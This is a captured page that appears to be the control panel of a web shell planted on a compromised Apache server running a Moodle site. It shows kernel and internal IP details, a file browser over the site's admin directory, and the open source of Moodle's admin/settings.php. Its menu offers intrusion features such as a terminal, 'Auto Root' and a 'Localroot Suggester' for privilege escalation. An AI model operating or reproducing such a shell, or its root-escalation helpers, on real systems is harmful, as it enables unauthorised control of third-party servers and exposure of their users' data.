Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
sipdm.cesa.co.za /
admin /
Delete
Unzip
Name
Size
Permission
Date
Action
cli
[ DIR ]
drwxr-sr-x
2017-06-22 14:51
mnet
[ DIR ]
drwxr-sr-x
2017-06-22 14:51
registration
[ DIR ]
drwxr-sr-x
2017-06-22 14:51
roles
[ DIR ]
drwxr-sr-x
2017-06-22 14:51
settings
[ DIR ]
drwxr-sr-x
2017-06-22 14:52
templates
[ DIR ]
drwxr-sr-x
2017-06-22 14:52
tests
[ DIR ]
drwxr-sr-x
2017-06-22 14:51
tool
[ DIR ]
drwxr-sr-x
2017-06-22 14:55
user
[ DIR ]
drwxr-sr-x
2017-06-22 14:57
webservice
[ DIR ]
drwxr-sr-x
2017-06-22 14:57
admin_settings_search_form.php
1.64
KB
-rw-r--r--
2017-06-22 14:51
antiviruses.php
3.38
KB
-rw-r--r--
2017-06-22 14:51
auth.php
2.92
KB
-rw-r--r--
2017-06-22 14:51
auth_config.php
7.39
KB
-rw-r--r--
2017-06-22 14:51
blocks.php
9.71
KB
-rw-r--r--
2017-06-22 14:51
category.php
5.9
KB
-rw-r--r--
2017-06-22 14:51
courseformats.php
2.93
KB
-rw-r--r--
2017-06-22 14:51
cron.php
2.71
KB
-rw-r--r--
2017-06-22 14:51
dataformats.php
2.71
KB
-rw-r--r--
2017-06-22 14:51
editors.php
2.65
KB
-rw-r--r--
2017-06-22 14:51
enrol.php
4.26
KB
-rw-r--r--
2017-06-22 14:51
environment.php
4.17
KB
-rw-r--r--
2017-06-22 14:51
environment.xml
62.38
KB
-rw-r--r--
2017-06-22 14:51
filters.php
8.76
KB
-rw-r--r--
2017-06-22 14:51
index.php
36.11
KB
-rw-r--r--
2017-06-22 14:51
lib.php
4.49
KB
-rw-r--r--
2017-06-22 14:51
licenses.php
1.53
KB
-rw-r--r--
2017-06-22 14:51
localplugins.php
2.66
KB
-rw-r--r--
2017-06-22 14:51
mailout-debugger.php
2.2
KB
-rw-r--r--
2017-06-22 14:51
media.php
2.45
KB
-rw-r--r--
2017-06-22 14:51
message.php
2.52
KB
-rw-r--r--
2017-06-22 14:51
modules.php
6.49
KB
-rw-r--r--
2017-06-22 14:51
oauth2callback.php
1.65
KB
-rw-r--r--
2017-06-22 14:51
phpinfo.php
968
B
-rw-r--r--
2017-06-22 14:51
plagiarism.php
3.17
KB
-rw-r--r--
2017-06-22 14:51
plugins.php
8.89
KB
-rw-r--r--
2017-06-22 14:51
portfolio.php
8.57
KB
-rw-r--r--
2017-06-22 14:51
process_email.php
1.72
KB
-rw-r--r--
2017-06-22 14:51
purgecaches.php
2.24
KB
-rw-r--r--
2017-06-22 14:51
qbehaviours.php
8.47
KB
-rw-r--r--
2017-06-22 14:51
qtypes.php
9.17
KB
-rw-r--r--
2017-06-22 14:51
renderer.php
83.56
KB
-rw-r--r--
2017-06-22 14:51
reports.php
4.11
KB
-rw-r--r--
2017-06-22 14:51
repository.php
16.85
KB
-rw-r--r--
2017-06-22 14:51
repositoryinstance.php
5.79
KB
-rw-r--r--
2017-06-22 14:51
resetemoticons.php
1.63
KB
-rw-r--r--
2017-06-22 14:51
search.php
2.09
KB
-rw-r--r--
2017-06-22 14:51
searchareas.php
6.83
KB
-rw-r--r--
2017-06-22 14:51
settings.php
4.85
KB
-rw-r--r--
2017-06-22 14:52
thirdpartylibs.php
2.56
KB
-rw-r--r--
2017-06-22 14:52
timezone.php
1.62
KB
-rw-r--r--
2017-06-22 14:52
tools.php
3.55
KB
-rw-r--r--
2017-06-22 14:56
upgrade.txt
425
B
-rw-r--r--
2017-06-22 14:56
upgradesettings.php
2.48
KB
-rw-r--r--
2017-06-22 14:56
user.php
17.63
KB
-rw-r--r--
2017-06-22 14:57
Save
Rename
<?php require_once('../config.php'); require_once($CFG->libdir.'/adminlib.php'); $section = required_param('section', PARAM_SAFEDIR); $return = optional_param('return','', PARAM_ALPHA); $adminediting = optional_param('adminedit', -1, PARAM_BOOL); /// no guest autologin require_login(0, false); $PAGE->set_context(context_system::instance()); $PAGE->set_url('/admin/settings.php', array('section' => $section)); $PAGE->set_pagetype('admin-setting-' . $section); $PAGE->set_pagelayout('admin'); $PAGE->navigation->clear_cache(); navigation_node::require_admin_tree(); $adminroot = admin_get_root(); // need all settings $settingspage = $adminroot->locate($section, true); if (empty($settingspage) or !($settingspage instanceof admin_settingpage)) { if (moodle_needs_upgrading()) { redirect(new moodle_url('/admin/index.php')); } else { print_error('sectionerror', 'admin', "$CFG->wwwroot/$CFG->admin/"); } die; } if (!($settingspage->check_access())) { print_error('accessdenied', 'admin'); die; } /// WRITING SUBMITTED DATA (IF ANY) ------------------------------------------------------------------------------- $statusmsg = ''; $errormsg = ''; if ($data = data_submitted() and confirm_sesskey()) { if (admin_write_settings($data)) { redirect($PAGE->url, get_string('changessaved'), null, \core\output\notification::NOTIFY_SUCCESS); } if (empty($adminroot->errors)) { switch ($return) { case 'site': redirect("$CFG->wwwroot/"); case 'admin': redirect("$CFG->wwwroot/$CFG->admin/"); } redirect($PAGE->url); } else { $errormsg = get_string('errorwithsettings', 'admin'); $firsterror = reset($adminroot->errors); } $settingspage = $adminroot->locate($section, true); } if ($PAGE->user_allowed_editing() && $adminediting != -1) { $USER->editing = $adminediting; } /// print header stuff ------------------------------------------------------------ if (empty($SITE->fullname)) { $PAGE->set_title($settingspage->visiblename); $PAGE->set_heading($settingspage->visiblename); echo $OUTPUT->header(); echo $OUTPUT->box(get_string('configintrosite', 'admin')); if ($errormsg !== '') { echo $OUTPUT->notification($errormsg); } else if ($statusmsg !== '') { echo $OUTPUT->notification($statusmsg, 'notifysuccess'); } // --------------------------------------------------------------------------------------------------------------- $pageparams = $PAGE->url->params(); $context = [ 'actionurl' => $PAGE->url->out(false), 'params' => array_map(function($param) use ($pageparams) { return [ 'name' => $param, 'value' => $pageparams[$param] ]; }, array_keys($pageparams)), 'sesskey' => sesskey(), 'return' => $return, 'title' => null, 'settings' => $settingspage->output_html(), 'showsave' => true ]; echo $OUTPUT->render_from_template('core_admin/settings', $context); } else { if ($PAGE->user_allowed_editing()) { $url = clone($PAGE->url); if ($PAGE->user_is_editing()) { $caption = get_string('blockseditoff'); $url->param('adminedit', 'off'); } else { $caption = get_string('blocksediton'); $url->param('adminedit', 'on'); } $buttons = $OUTPUT->single_button($url, $caption, 'get'); $PAGE->set_button($buttons); } $visiblepathtosection = array_reverse($settingspage->visiblepath); $PAGE->set_title("$SITE->shortname: " . implode(": ",$visiblepathtosection)); $PAGE->set_heading($SITE->fullname); echo $OUTPUT->header(); if ($errormsg !== '') { echo $OUTPUT->notification($errormsg); } else if ($statusmsg !== '') { echo $OUTPUT->notification($statusmsg, 'notifysuccess'); } // --------------------------------------------------------------------------------------------------------------- $pageparams = $PAGE->url->params(); $context = [ 'actionurl' => $PAGE->url->out(false), 'params' => array_map(function($param) use ($pageparams) { return [ 'name' => $param, 'value' => $pageparams[$param] ]; }, array_keys($pageparams)), 'sesskey' => sesskey(), 'return' => $return, 'title' => $settingspage->visiblename, 'settings' => $settingspage->output_html(), 'showsave' => $settingspage->show_save() ]; echo $OUTPUT->render_from_template('core_admin/settings', $context); } $PAGE->requires->yui_module('moodle-core-formchangechecker', 'M.core_formchangechecker.init', array(array( 'formid' => 'adminsettings' )) ); $PAGE->requires->string_for_js('changesmadereallygoaway', 'moodle'); echo $OUTPUT->footer();